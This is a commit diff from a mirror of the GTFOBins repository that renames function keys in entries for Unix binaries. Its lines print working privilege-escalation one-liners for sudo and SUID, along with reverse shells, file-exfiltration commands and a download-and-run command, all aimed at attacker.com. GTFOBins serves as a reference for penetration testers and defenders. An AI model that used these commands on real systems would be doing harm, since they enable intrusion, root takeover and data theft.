mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Adopt new function names
This commit is contained in:
parent
1c77f099d3
commit
dd337b5ddf
@ -19,8 +19,8 @@ reverse-shell:
|
|||||||
It can send back a reverse shell to a listening attacker to open a remote
|
It can send back a reverse shell to a listening attacker to open a remote
|
||||||
network access.
|
network access.
|
||||||
|
|
||||||
reverse-non-interactive-shell:
|
non-interactive-reverse-shell:
|
||||||
label: Reverse non-interactive shell
|
label: Non-interactive reverse shell
|
||||||
description: |
|
description: |
|
||||||
It can send back a non-interactive reverse shell to a listening attacker to
|
It can send back a non-interactive reverse shell to a listening attacker to
|
||||||
open a remote network access.
|
open a remote network access.
|
||||||
@ -30,8 +30,8 @@ bind-shell:
|
|||||||
description: |
|
description: |
|
||||||
It can bind a shell to a local port to allow remote network access.
|
It can bind a shell to a local port to allow remote network access.
|
||||||
|
|
||||||
bind-non-interactive-shell:
|
non-interactive-bind-shell:
|
||||||
label: Bind non-interactive shell
|
label: Non-interactive bind shell
|
||||||
description: |
|
description: |
|
||||||
It can bind a non-interactive shell to a local port to allow remote network
|
It can bind a non-interactive shell to a local port to allow remote network
|
||||||
access.
|
access.
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
apt-get changelog apt
|
apt-get changelog apt
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo apt-get changelog apt
|
sudo apt-get changelog apt
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
apt-get changelog apt
|
apt-get changelog apt
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo apt-get changelog apt
|
sudo apt-get changelog apt
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
description: Note that the subprocess is immediately sent to the background.
|
description: Note that the subprocess is immediately sent to the background.
|
||||||
functions:
|
functions:
|
||||||
execute-non-interactive:
|
command:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
@ -10,14 +10,14 @@ functions:
|
|||||||
aria2c --on-download-error=$TF http://x
|
aria2c --on-download-error=$TF http://x
|
||||||
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
||||||
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo "$COMMAND" > $TF
|
echo "$COMMAND" > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
./aria2c --on-download-error=$TF http://x
|
./aria2c --on-download-error=$TF http://x
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: ash
|
- code: ash
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
export LFILE=file_to_write
|
export LFILE=file_to_write
|
||||||
ash -c 'echo DATA > $LFILE'
|
ash -c 'echo DATA > $LFILE'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: "./ash"
|
- code: "./ash"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo ash
|
- code: sudo ash
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||||
reverse-shell-non-interactive:
|
non-interactive-reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
@ -11,7 +11,7 @@ functions:
|
|||||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||||
bind-shell-non-interactive:
|
non-interactive-bind-shell:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
@ -27,8 +27,8 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
awk '//' "$LFILE"
|
awk '//' "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||||
---
|
---
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
base64 "$LFILE" | base64 --decode
|
base64 "$LFILE" | base64 --decode
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./base64 "$LFILE" | base64 --decode
|
./base64 "$LFILE" | base64 --decode
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo base64 "$LFILE" | base64 --decode
|
sudo base64 "$LFILE" | base64 --decode
|
||||||
|
@ -1,14 +1,14 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: bash
|
- code: bash
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -21,7 +21,7 @@ functions:
|
|||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -58,8 +58,8 @@ functions:
|
|||||||
HISTTIMEFORMAT=$'\r\e[K'
|
HISTTIMEFORMAT=$'\r\e[K'
|
||||||
history -r $LFILE
|
history -r $LFILE
|
||||||
history
|
history
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: "./bash -p"
|
- code: "./bash -p"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo bash
|
- code: sudo bash
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
|
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: busybox sh
|
- code: busybox sh
|
||||||
upload:
|
file-upload:
|
||||||
- description: Serve files in the local folder running an HTTP server.
|
- description: Serve files in the local folder running an HTTP server.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
@ -16,9 +16,9 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./busybox cat "$LFILE"
|
./busybox cat "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||||
code: "./busybox sh"
|
code: "./busybox sh"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo busybox sh
|
- code: sudo busybox sh
|
||||||
---
|
---
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
cat "$LFILE"
|
cat "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./cat "$LFILE"
|
./cat "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo cat "$LFILE"
|
sudo cat "$LFILE"
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
|
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
|
||||||
functions:
|
functions:
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_change
|
LFILE=file_to_change
|
||||||
./chmod 0777 $LFILE
|
./chmod 0777 $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_change
|
LFILE=file_to_change
|
||||||
sudo chmod 0777 $LFILE
|
sudo chmod 0777 $LFILE
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
|
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
|
||||||
functions:
|
functions:
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_change
|
LFILE=file_to_change
|
||||||
./chown $(id -un):$(id -gn) $LFILE
|
./chown $(id -un):$(id -gn) $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_change
|
LFILE=file_to_change
|
||||||
sudo chown $(id -un):$(id -gn) $LFILE
|
sudo chown $(id -un):$(id -gn) $LFILE
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
|
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
|
||||||
functions:
|
functions:
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo "DATA" > $TF
|
echo "DATA" > $TF
|
||||||
./cp $TF $LFILE
|
./cp $TF $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: cpulimit -l 100 -f /bin/sh
|
- code: cpulimit -l 100 -f /bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo cpulimit -l 100 -f /bin/sh
|
- code: sudo cpulimit -l 100 -f /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-non-interactive:
|
command:
|
||||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||||
code: crontab -e
|
code: crontab -e
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||||
code: sudo crontab -e
|
code: sudo crontab -e
|
||||||
---
|
---
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: csh
|
- code: csh
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
export LFILE=file_to_write
|
export LFILE=file_to_write
|
||||||
ash -c 'echo DATA > $LFILE'
|
ash -c 'echo DATA > $LFILE'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: "./csh -b"
|
- code: "./csh -b"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo csh
|
- code: sudo csh
|
||||||
---
|
---
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
|
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
|
||||||
code: |
|
code: |
|
||||||
URL=http://attacker.com/
|
URL=http://attacker.com/
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
curl -X POST -d @$file_to_send $URL
|
curl -X POST -d @$file_to_send $URL
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
URL=http://attacker.com/file_to_get
|
URL=http://attacker.com/file_to_get
|
||||||
@ -17,13 +17,13 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LFILE=/tmp/file_to_read
|
LFILE=/tmp/file_to_read
|
||||||
curl file://$LFILE
|
curl file://$LFILE
|
||||||
suid-enabled:
|
suid:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
URL=http://attacker.com/file_to_get
|
URL=http://attacker.com/file_to_get
|
||||||
LFILE=file_to_save
|
LFILE=file_to_save
|
||||||
./curl $URL -o $LFILE
|
./curl $URL -o $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
URL=http://attacker.com/file_to_get
|
URL=http://attacker.com/file_to_get
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
cut -d "" -f1 "$LFILE"
|
cut -d "" -f1 "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./cut -d "" -f1 "$LFILE"
|
./cut -d "" -f1 "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo cut -d "" -f1 "$LFILE"
|
sudo cut -d "" -f1 "$LFILE"
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: dash
|
- code: dash
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
export LFILE=file_to_write
|
export LFILE=file_to_write
|
||||||
ash -c 'echo DATA > $LFILE'
|
ash -c 'echo DATA > $LFILE'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./dash -p
|
- code: ./dash -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo dash
|
- code: sudo dash
|
||||||
---
|
---
|
||||||
|
@ -8,11 +8,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
date -f $LFILE
|
date -f $LFILE
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./date -f $LFILE
|
./date -f $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo date -f $LFILE
|
sudo date -f $LFILE
|
||||||
|
@ -8,11 +8,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
dd if=LFILE
|
dd if=LFILE
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo "data" | ./dd of=$LFILE
|
echo "data" | ./dd of=$LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo "data" | sudo -E dd of=$LFILE
|
echo "data" | sudo -E dd of=$LFILE
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
diff --line-format=%L /dev/null $LFILE
|
diff --line-format=%L /dev/null $LFILE
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./diff --line-format=%L /dev/null $LFILE
|
./diff --line-format=%L /dev/null $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo diff --line-format=%L /dev/null $LFILE
|
sudo diff --line-format=%L /dev/null $LFILE
|
||||||
|
@ -2,11 +2,11 @@
|
|||||||
description: |
|
description: |
|
||||||
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
|
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
|
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||||
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
./docker run --rm -v /home/$USER:/h_docs ubuntu \
|
./docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||||
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||||
easy_install $TF
|
easy_install $TF
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -16,7 +16,7 @@ functions:
|
|||||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||||
easy_install $TF
|
easy_install $TF
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
@ -36,7 +36,7 @@ functions:
|
|||||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||||
easy_install $TF
|
easy_install $TF
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
|
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
@ -62,12 +62,12 @@ functions:
|
|||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo 'print(open("file_to_read").read())' > $TF/setup.py
|
echo 'print(open("file_to_read").read())' > $TF/setup.py
|
||||||
easy_install $TF
|
easy_install $TF
|
||||||
load-library:
|
library-load:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||||
easy_install $TF
|
easy_install $TF
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
ed
|
ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
@ -17,11 +17,11 @@ functions:
|
|||||||
ed file_to_read
|
ed file_to_read
|
||||||
,p
|
,p
|
||||||
q
|
q
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo ed
|
sudo ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: |
|
- code: |
|
||||||
./ed
|
./ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
@ -9,8 +9,8 @@ functions:
|
|||||||
C-x C-s
|
C-x C-s
|
||||||
file-read:
|
file-read:
|
||||||
- code: emacs file_to_read
|
- code: emacs file_to_read
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: env /bin/sh
|
- code: env /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./env /bin/sh -p
|
- code: ./env /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo env /bin/sh
|
- code: sudo env /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
expand "$LFILE"
|
expand "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./expand "$LFILE"
|
./expand "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo expand "$LFILE"
|
sudo expand "$LFILE"
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: expect -c 'spawn /bin/sh;interact'
|
- code: expect -c 'spawn /bin/sh;interact'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||||
---
|
---
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo 'exec("/bin/sh")' > $TF/x.rb
|
echo 'exec("/bin/sh")' > $TF/x.rb
|
||||||
FACTERLIB=$TF facter
|
FACTERLIB=$TF facter
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo 'exec("/bin/sh")' > $TF/x.rb
|
echo 'exec("/bin/sh")' > $TF/x.rb
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: find . -exec /bin/sh \; -quit
|
- code: find . -exec /bin/sh \; -quit
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./find . -exec /bin/sh -p \; -quit
|
- code: ./find . -exec /bin/sh -p \; -quit
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo find . -exec /bin/sh \; -quit
|
- code: sudo find . -exec /bin/sh \; -quit
|
||||||
---
|
---
|
||||||
|
@ -2,13 +2,13 @@
|
|||||||
description: |
|
description: |
|
||||||
`finger` hangs waiting for the remote peer to close the socket.
|
`finger` hangs waiting for the remote peer to close the socket.
|
||||||
functions:
|
functions:
|
